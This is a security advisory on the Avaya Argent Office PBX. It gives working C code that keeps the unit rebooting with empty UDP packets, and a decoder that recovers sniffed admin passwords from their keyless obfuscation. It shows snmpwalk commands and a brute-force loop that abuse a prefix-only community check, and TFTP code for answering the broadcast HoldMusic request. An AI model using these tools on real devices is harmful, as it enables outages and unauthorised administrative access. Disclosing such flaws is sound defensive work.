COMMAND

    Argent Office

SYSTEMS AFFECTED

    Avaya Argent Office

PROBLEM

    Jacek Lipkowski found the following.  The Argent branch of products
    (now known as the Network Alchemy line) from Avaya is a solution
    integrating a PBX, network connectivity, dial-on-demand networking
    etc.  Jacek had some security concerns when he looked at it.  Since
    all of them are only exploitable from the local network (and  since
    this system is designed for small offices), they shouldn't be  much
    of a problem.

    Local denial of service
    =======================
    By sending a UDP packet with no payload to port 53 the Argent Office
    reboots.  The unit comes back up very quickly, so to keep it down one
    needs to send the packets repeatedly.  Sample source code below:

    /* argent_kill.c
    (c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl
    Reboots an Argent Office box by sending udp packets with no payload to port 53
    usage: argent_kill ip_address
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <unistd.h>

    int main(int argc, char *argv[])
    {
        struct sockaddr_in addr;
        struct hostent *host;
        int s;

        if (argc != 2) { fprintf(stderr, "usage: %s ip_address\n", argv[0]); exit(1); }

        s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if (s == -1) { perror("socket()"); exit(1); }
        host = gethostbyname(argv[1]);
        if (host == 0) { herror("gethostbyname"); exit(1); }

        memset(&addr, 0, sizeof(addr));
        memcpy(&addr.sin_addr, host->h_addr, host->h_length);
        addr.sin_port = htons(53);        /* the DNS port is what triggers the reboot */
        addr.sin_family = AF_INET;
        /* connect() on a UDP socket only fixes the destination used by send() */
        if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) == -1) { perror("connect()"); exit(1); }

        /* send an empty (zero-length) datagram once a second; the box reboots
           on each one, so keep going to hold it down */
        for (;;)
        {
            send(s, 0, 0, 0); sleep(1); printf("."); fflush(stdout);
        }
        close(s);   /* not reached; stop with Ctrl-C */
        return 0;
    }

    Easily decryptable configuration password
    =========================================
    Configuring the Argent Office is done through a strange TFTP look-alike.
    For example, to reboot a unit one must get the following file via tftp:

        nasystem/rebootwhenfree/00e007002666/password//

    where 00e007002666 is the MAC address of the unit and password is the
    obfuscated password.  TFTP is cleartext UDP, so this request is easily
    sniffed, and since the obfuscation algorithm is fixed and keyless,
    anyone with a sniffer on the LAN can recover the password and obtain
    administrative privileges.  The obfuscation mechanism is rather
    simple, as the following example demonstrates:

    /* argent_obfuscate.c
    (c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl
    demonstrates how the password obfuscation
    mechanism works in argent office products */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char **argv)
    {
        int i;
        unsigned char buf[32];

        if (argc != 2 || strlen(argv[1]) >= sizeof(buf)) {
            fprintf(stderr, "usage: argent_obfuscate password (at most %zu chars)\n", sizeof(buf) - 1);
            exit(1);
        }
        strcpy((char *)buf, argv[1]);
        /* every byte is shifted by 0x11 minus its position: out[i] = in[i] + 0x11 - i */
        for (i = 0; i < (int)strlen(argv[1]); i++)
            printf("0x%2.2X ", buf[i] + 0x11 - i);
        printf("\n");
        return 0;
    }

    Showing the hex values for the password 'idiocy':

        ~$ ./argent_obfuscate idiocy
        0x7A 0x74 0x78 0x7D 0x70 0x85

    Each byte is just shifted by 0x11 minus its position in the string,
    so reversing it means subtracting the same offset.  Writing a
    decryption routine is left as an exercise to the reader.
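    The exercise worked through, as an added example that is not part of
    the original advisory or of Jacek's code: the forward transform from
    argent_obfuscate.c applied to a byte array, and its inverse, checked
    against the bytes shown above for 'idiocy'.  It assumes the
    obfuscated password travels as raw bytes (the page does not say how
    the bytes are placed in the TFTP filename), and it works mod 256,
    which agrees with the ints the original program prints for printable
    passwords of realistic length.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not code from the advisory or the product.
 * Forward transform (what argent_obfuscate.c prints): out[i] = in[i] + 0x11 - i
 * Inverse:                                             in[i] = out[i] - 0x11 + i
 * Arithmetic is on bytes, i.e. mod 256 (assumption: the wire carries raw bytes). */

/* Obfuscate len bytes of in into out. Returns len. */
size_t argent_obfuscate(const unsigned char *in, size_t len, unsigned char *out)
{
    for (size_t i = 0; i < len; i++)
        out[i] = (unsigned char)(in[i] + 0x11 - i);
    return len;
}

/* Recover the cleartext password from len sniffed bytes.
 * out must hold len + 1 bytes; it is NUL-terminated. Returns len. */
size_t argent_deobfuscate(const unsigned char *in, size_t len, char *out)
{
    for (size_t i = 0; i < len; i++)
        out[i] = (char)(unsigned char)(in[i] - 0x11 + i);
    out[len] = '\0';
    return len;
}

int main(void)
{
    /* Constructed sample: the bytes the advisory shows for the password "idiocy". */
    const unsigned char sniffed[] = { 0x7A, 0x74, 0x78, 0x7D, 0x70, 0x85 };
    char plain[sizeof sniffed + 1];
    unsigned char again[sizeof sniffed];

    argent_deobfuscate(sniffed, sizeof sniffed, plain);
    printf("recovered password: %s\n", plain);

    /* round trip: re-obfuscating must give the sniffed bytes back */
    argent_obfuscate((const unsigned char *)plain, strlen(plain), again);
    for (size_t i = 0; i < sizeof again; i++)
        printf("0x%02X ", again[i]);
    printf("\n");
    return 0;
}
```

    There is no key anywhere in the transform, so one sniffed request is
    all an attacker on the LAN needs; a per-unit secret or a real
    authenticated transport, not a different constant, would be the fix.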

    Dumb SNMP handling
    ==================
    This is a really good one!  The software does SNMP authentication
    via something similar to:

        if (strncmp(n,c,strlen(n))==0) { ok, valid community}

    where c is the configured community string and n is the community
    string from the network.  Only strlen(n) bytes are compared, and n
    is attacker-controlled, so any prefix of the real community string
    is accepted.

    In particular, if the size of the community in the packet is 0 then
    the authentication succeeds:

        ~$ snmpwalk 192.168.1.234 "" system.sysDescr.0
        system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)

    Because every prefix is accepted, you can also recover the community
    string one character at a time, using whether the unit answers or
    times out as the oracle.

    Guess the first letter:

        ~$ snmpwalk 192.168.1.234 a system.sysDescr.0
        Timeout: No Response from 192.168.1.234
        [the first letter is not a]
        [several combinations later, is it p?]
        ~$ snmpwalk 192.168.1.234 p system.sysDescr.0
        system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)
        
        [ok we have the first letter, lets go for the second]
        ~$ snmpwalk 192.168.1.234 pa system.sysDescr.0
        Timeout: No Response from 192.168.1.234
        [the second letter is not a]
        [several combinations later, is it r?]
        ~$ snmpwalk 192.168.1.234 pr system.sysDescr.0
        system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)
        
        etc... (the community is 'private')

    While not much is gained from SNMP access itself, the community may
    be some company standard, and knowing it may open other doors.
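    The comparison bug and the character-by-character recovery above,
    as an added example (not the unit's firmware and not Jacek's code):
    the flawed prefix check as the advisory describes it, a check that
    compares full lengths in constant time, and the guessing loop run
    against a local stand-in for the device.  The community "private"
    is the page's own value; the oracle function simulates the answer /
    timeout behaviour in-process instead of sending SNMP packets.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the advisory or the product. The "device" is
 * simulated: g_secret stands in for its configured community string. */

/* The flawed check as the page describes it: only strlen(n) bytes are
 * compared, n being what arrived on the network, so "" and every prefix
 * of the real community are accepted. */
int community_ok_flawed(const char *n, const char *c)
{
    return strncmp(n, c, strlen(n)) == 0;
}

/* Correct check: lengths must be equal and every byte must match.
 * The loop always runs over the whole configured string so the time
 * taken does not reveal where the first mismatch is. */
int community_ok_fixed(const char *n, const char *c)
{
    size_t nl = strlen(n), cl = strlen(c);
    unsigned char diff = (unsigned char)(nl != cl);
    for (size_t i = 0; i < cl; i++)
        diff |= (unsigned char)(c[i] ^ (i < nl ? n[i] : 0));
    return diff == 0;
}

/* oracle(guess) returns 1 when the device answers, 0 when it times out. */
typedef int (*oracle_fn)(const char *guess);

static const char *g_secret;     /* constructed: the simulated device's community */
static int sim_oracle(const char *guess) { return community_ok_flawed(guess, g_secret); }

/* Extend the known prefix one byte at a time; stop when no extension is
 * accepted, which means the full community has been recovered. Cost is at
 * most strlen(alphabet) * strlen(community) queries rather than
 * strlen(alphabet) ^ strlen(community). Returns the number of queries. */
size_t recover_community(oracle_fn oracle, const char *alphabet, char *out, size_t outsz)
{
    size_t len = 0, queries = 0;
    out[0] = '\0';
    while (len + 1 < outsz) {
        int found = 0;
        for (const char *a = alphabet; *a; a++) {
            out[len] = *a; out[len + 1] = '\0';
            queries++;
            if (oracle(out)) { found = 1; break; }
        }
        if (!found) { out[len] = '\0'; break; }
        len++;
    }
    return queries;
}

int main(void)
{
    char out[64];
    g_secret = "private";
    printf("empty community accepted by flawed check: %d\n", community_ok_flawed("", g_secret));
    printf("empty community accepted by fixed check:  %d\n", community_ok_fixed("", g_secret));
    size_t q = recover_community(sim_oracle, "abcdefghijklmnopqrstuvwxyz", out, sizeof out);
    printf("recovered community \"%s\" in %zu queries\n", out, q);
    return 0;
}
```

    Against a real unit each oracle call is one snmpwalk/snmpget and a
    timeout, so the loop is slow but still linear in the length of the
    community; the fixed check removes the oracle entirely.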

    Broadcast tftp requests
    =======================
    The system in its default config requests a file called HoldMusic
    via tftp from the broadcast address, so any host on the LAN can
    answer.  You could probably serve the file and change your company's
    music-on-hold tune to something more interesting.
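    Both TFTP exchanges on this page, the reboot command fetched as a
    filename and the broadcast HoldMusic request, as an added example
    that is not code from the advisory or the product: build and parse
    RFC 1350 read requests and build the first DATA block a rogue server
    would answer with.  Assumptions: transfer mode "octet" (the page does
    not say which mode the unit uses); the MAC, the "XXXXXX" password
    field and the DATA payload are constructed placeholders.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Added example, not from the advisory or the product. TFTP RRQ layout
 * (RFC 1350): 2-byte opcode 1, filename, NUL, mode, NUL.
 * DATA: opcode 3, 2-byte block number, up to 512 bytes of payload. */

#define TFTP_RRQ   1
#define TFTP_DATA  3
#define TFTP_BLOCK 512

/* Encode an RRQ into buf. Returns the packet length, or 0 if it does not fit. */
size_t tftp_build_rrq(const char *filename, const char *mode,
                      unsigned char *buf, size_t bufsz)
{
    size_t fl = strlen(filename), ml = strlen(mode);
    size_t need = 2 + fl + 1 + ml + 1;
    if (need > bufsz) return 0;
    buf[0] = 0; buf[1] = TFTP_RRQ;              /* opcode, network byte order */
    memcpy(buf + 2, filename, fl + 1);          /* filename including NUL */
    memcpy(buf + 2 + fl + 1, mode, ml + 1);     /* mode including NUL */
    return need;
}

/* Decode an RRQ. Returns 1 and fills filename/mode, or 0 for a malformed
 * packet (wrong opcode, missing NUL terminator, field too long for the buffer). */
int tftp_parse_rrq(const unsigned char *pkt, size_t len,
                   char *filename, size_t fnsz, char *mode, size_t modesz)
{
    if (len < 4 || pkt[0] != 0 || pkt[1] != TFTP_RRQ) return 0;
    const unsigned char *p = pkt + 2, *end = pkt + len, *z;
    z = memchr(p, 0, (size_t)(end - p));
    if (!z || (size_t)(z - p) >= fnsz) return 0;
    memcpy(filename, p, (size_t)(z - p) + 1);
    p = z + 1;
    z = memchr(p, 0, (size_t)(end - p));
    if (!z || (size_t)(z - p) >= modesz) return 0;
    memcpy(mode, p, (size_t)(z - p) + 1);
    return 1;
}

/* Encode DATA block 'block' carrying n <= 512 bytes. A block shorter than
 * 512 bytes tells the client the transfer is complete. Returns length or 0. */
size_t tftp_build_data(uint16_t block, const unsigned char *data, size_t n,
                       unsigned char *buf, size_t bufsz)
{
    if (n > TFTP_BLOCK || bufsz < 4 + n) return 0;
    buf[0] = 0; buf[1] = TFTP_DATA;
    buf[2] = (unsigned char)(block >> 8); buf[3] = (unsigned char)(block & 0xff);
    memcpy(buf + 4, data, n);
    return 4 + n;
}

static void hexdump(const char *label, const unsigned char *b, size_t n)
{
    printf("%s (%zu bytes):", label, n);
    for (size_t i = 0; i < n; i++) printf(" %02x", b[i]);
    printf("\n");
}

int main(void)
{
    unsigned char pkt[128];
    char fn[64], mode[16];

    /* 1. The reboot command as it crosses the LAN: the whole path, password
     *    field included, is visible to a sniffer. "XXXXXX" is a constructed
     *    placeholder for the obfuscated password bytes. */
    size_t n = tftp_build_rrq("nasystem/rebootwhenfree/00e007002666/XXXXXX//", "octet", pkt, sizeof pkt);
    hexdump("reboot RRQ", pkt, n);

    /* 2. The unit's broadcast request for HoldMusic, as a rogue server sees it. */
    n = tftp_build_rrq("HoldMusic", "octet", pkt, sizeof pkt);
    if (tftp_parse_rrq(pkt, n, fn, sizeof fn, mode, sizeof mode) && strcmp(fn, "HoldMusic") == 0) {
        /* 3. Answer with DATA block 1 (constructed payload). A real server
         *    sends the file 512 bytes per block and waits for each ACK. */
        const unsigned char tune[] = "not the real hold music";
        n = tftp_build_data(1, tune, sizeof tune - 1, pkt, sizeof pkt);
        hexdump("HoldMusic DATA#1", pkt, n);
    }
    return 0;
}
```

    Because the request goes to the broadcast address, whoever replies
    first wins; there is nothing in TFTP that lets the unit tell the real
    server from a rogue one.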

    All these vulnerabilities can be exercised only from internal
    interfaces (haven't found a way to kill it from the dialup
    interface), so the impact is usually minor (the local staff could
    launch a much more destructive dos attack using a hammer), unless
    your network is public or has other entry points.

SOLUTION

    Nothing yet.